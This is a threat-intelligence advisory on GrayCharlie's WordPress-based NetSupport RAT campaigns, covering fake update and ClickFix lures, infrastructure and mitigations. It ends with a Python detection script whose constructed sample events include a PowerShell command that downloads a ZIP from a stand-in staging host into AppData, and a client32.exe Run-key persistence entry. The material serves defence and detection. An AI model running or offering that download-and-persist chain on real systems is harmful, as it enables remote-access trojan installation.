GrayCharlie is a financially motivated threat actor active since mid-2023. The group specializes in compromising WordPress websites to deliver NetSupport RAT through fake browser update lures and ClickFix social engineering techniques. In late 2025, the actor was linked to a suspected supply-chain compromise affecting multiple U.S. law firms. The campaign infrastructure is largely hosted with MivoCloud and HZ Hosting Ltd, with operational indicators suggesting Russian-speaking operators.
Severity: High
Threat Actor Profile
- Aliases: GrayCharlie overlaps with activity tracked as SmartApeSG, ZPHP, and HANEYMANEY.
- Origin/Language: Evidence from higher-tier infrastructure and browsing activity suggests the operators are Russian-speaking.
- Active Since: Mid-2023.
- Motivation: Primarily data theft and financial gain.
- Strategic Outlook: The group is highly persistent, frequently rotating infrastructure while maintaining consistent core behaviors; they are expected to remain active and continue targeting global organizations.
Attack Details
1. Initial Access & Delivery:
- WordPress Compromise: Injects malicious JavaScript into legitimate but compromised WordPress sites.
- Phishing & Malicious Links: Uses phishing emails, malicious PDFs, or links on gaming sites to drive traffic to compromised pages.
2. Social Engineering Lures:
- Fake Browser Updates: Presents browser-specific prompts (Chrome, Edge, Firefox) to download a malicious package.
- ClickFix (Fake CAPTCHA): Since early 2025, the group has shifted toward ClickFix lures that trick users into pasting a malicious command into the Windows Run dialog (Win+R).
3. Execution & Persistence:
- Uses PowerShell and WScript to stage and retrieve secondary payloads.
- Establishes persistence via a Run registry key to relaunch malware at startup.
4. Evasion:
- Uses obfuscated JavaScript and conditional logic to deliver payloads only to specific visitors.
- Relies extensively on proxy services to administer staging and C2 infrastructure.
Malware Toolkit
- Primary Payload: NetSupport RAT, a remote access trojan used for reconnaissance, file transfers, and secondary command execution.
- Secondary Payloads:
• Stealc: An infostealer.
• SectopRAT: A RAT often deployed as a follow-on infection.
- Additional Tools: Operators utilize Acunetix vulnerability scanners on some C2 servers.
Infrastructure Analysis
- Hosting Providers: Primarily uses MivoCloud (for C2) and HZ Hosting Ltd (for staging).
- C2 Clustering:
- Cluster 1: Uses month-themed TLS certificates (e.g., “mar1”, “june2”).
- Cluster 2: Uses a distinct TLS pattern (e.g., “sssi3”) and typically hosts Acunetix.
- Staging Templates:
- Type 1: Impersonates “Wiser University”.
- Type 2: Impersonates “Activitar”.
Victimology & Targeting
- General Targeting: Opportunistic across numerous industries.
- Specific Campaign: A cluster of United States (US) law firm sites was compromised around November 2025.
- Supply-Chain Vector: Suspected compromise of SMB Team, a law firm acceleration company, potentially through compromised hosting credentials or WordPress plugin vulnerabilities.
Recommendations
- For organizations running WordPress, ensure all plugins and core software are updated to the latest versions to close potential exploitation gaps.
- Regularly rotate administrative credentials and implement Multi-Factor Authentication (MFA) to prevent actors from using compromised logins or credentials to access site backends.
- Implement DLP to detect and block unauthorized file transfers, as GrayCharlie’s primary motivation appears to be financial gain through data theft.
- Train users to recognize ClickFix lures (fake CAPTCHAs) and prevent them from pasting commands directly into the Windows Run dialog (Win+R).
- Scrutinize the execution of wscript.exe spawning powershell.exe, a key step in the actor’s staging process.
- Monitor for the creation of new Run registry keys to automatically launch client32.exe at logon, which the actor uses to establish persistence for NetSupport RAT on the endpoint.
- Create detection logic for PowerShell downloading a ZIP archive from a remote server and extracting it to %AppData%\Roaming.
- Block the IOCs at their respective controls.
https://www.virustotal.com/gui/collection/a8b46bc2b2ba022f3974b128e479e67f79476763bdb5f0c5f36c4b4ce7ad6a29/iocs
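The three endpoint behaviours called out in the Attack Details (WScript staging PowerShell, a Run key relaunching the payload, a ZIP pulled down and unpacked under AppData) map directly onto the detection recommendations above. The following Python script is an added example, not part of the advisory or Recorded Future's tooling: it encodes those three recommendations as rules and runs them over a handful of constructed Sysmon-style events (process creation as Event ID 1, registry value set as Event ID 13). The event schema, the hostnames, paths and SIDs in the sample data, and the rule names are all assumptions made for the example; the script generalizes slightly by also treating cscript.exe and pwsh.exe as equivalents of wscript.exe and powershell.exe.

```python
"""Detection rules for the GrayCharlie staging chain described in the advisory,
evaluated against constructed Sysmon-style events (hypothetical sample data)."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    """Minimal event record; only the fields the rules read (constructed schema)."""
    event_id: int               # 1 = process creation, 13 = registry value set
    image: str = ""             # executing process path
    parent_image: str = ""      # parent process path (event 1)
    command_line: str = ""      # process command line (event 1)
    target_object: str = ""     # registry path written (event 13)
    details: str = ""           # registry value data written (event 13)


# Script hosts and PowerShell binaries; cscript/pwsh are added as a generalization.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\\", re.IGNORECASE)
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|\bcurl\b|\bwget\b",
    re.IGNORECASE)
ZIP_RE = re.compile(r"\.zip\b", re.IGNORECASE)
APPDATA_RE = re.compile(r"\$env:appdata|%appdata%|\\appdata\\roaming", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path ("C:\\x\\y.exe" -> "y.exe")."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def wscript_spawns_powershell(ev: Event) -> bool:
    """Recommendation: scrutinize wscript.exe spawning powershell.exe."""
    return (ev.event_id == 1
            and basename(ev.parent_image) in SCRIPT_HOSTS
            and basename(ev.image) in POWERSHELL)


def run_key_launches_client32(ev: Event) -> bool:
    """Recommendation: new Run key whose value launches client32.exe at logon."""
    return (ev.event_id == 13
            and RUN_KEY_RE.search(ev.target_object) is not None
            and "client32.exe" in ev.details.lower())


def powershell_zip_to_appdata(ev: Event) -> bool:
    """Recommendation: PowerShell downloading a ZIP and extracting it under AppData\\Roaming."""
    if ev.event_id != 1 or basename(ev.image) not in POWERSHELL:
        return False
    cl = ev.command_line
    return bool(DOWNLOAD_RE.search(cl) and ZIP_RE.search(cl) and APPDATA_RE.search(cl))


RULES = {
    "graycharlie_wscript_to_powershell": wscript_spawns_powershell,
    "graycharlie_ps_zip_to_appdata": powershell_zip_to_appdata,
    "graycharlie_run_key_client32": run_key_launches_client32,
}


def evaluate(events):
    """Return (event index, rule name) for every rule that fires, in event order."""
    return [(i, name) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
RUN_KEY = r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run"

# Constructed sample telemetry: three events matching the advisory's chain, two benign.
SAMPLE_EVENTS = [
    Event(1, image=PS, parent_image=r"C:\Windows\System32\wscript.exe",
          command_line=r"powershell.exe -NoProfile -File C:\Users\alice\AppData\Local\Temp\stage.ps1"),
    Event(1, image=PS, parent_image=r"C:\Windows\explorer.exe",
          command_line=r'powershell.exe -c "Invoke-WebRequest http://staging.example/pkg.zip '
                       r'-OutFile $env:TEMP\pkg.zip; Expand-Archive $env:TEMP\pkg.zip $env:APPDATA\svc"'),
    Event(13, image=r"C:\Users\alice\AppData\Roaming\svc\client32.exe",
          target_object=RUN_KEY + r"\svc",
          details=r"C:\Users\alice\AppData\Roaming\svc\client32.exe"),
    Event(1, image=PS, parent_image=r"C:\Windows\explorer.exe",
          command_line="powershell.exe -NoProfile -Command Get-Process"),
    Event(13, image=r"C:\Windows\System32\msiexec.exe",
          target_object=RUN_KEY + r"\OneDrive",
          details=r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
]

if __name__ == "__main__":
    for index, rule_name in evaluate(SAMPLE_EVENTS):
        print(f"event {index}: {rule_name}")
```

Only the first three sample events fire (one rule each); the benign PowerShell invocation and the OneDrive Run value do not. The ZIP rule requires all three signals (download verb, .zip, AppData\Roaming path) in one command line, which keeps it quiet on ordinary administrative use of Invoke-WebRequest; in production the same three rules are better expressed as SIEM or EDR queries and correlated by host and time, since the advisory describes them as consecutive steps of one chain.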
Source:
- https://www.recordedfuture.com/research/graycharlie-hijacks-law-firm-sites-suspected-supply-chain-attack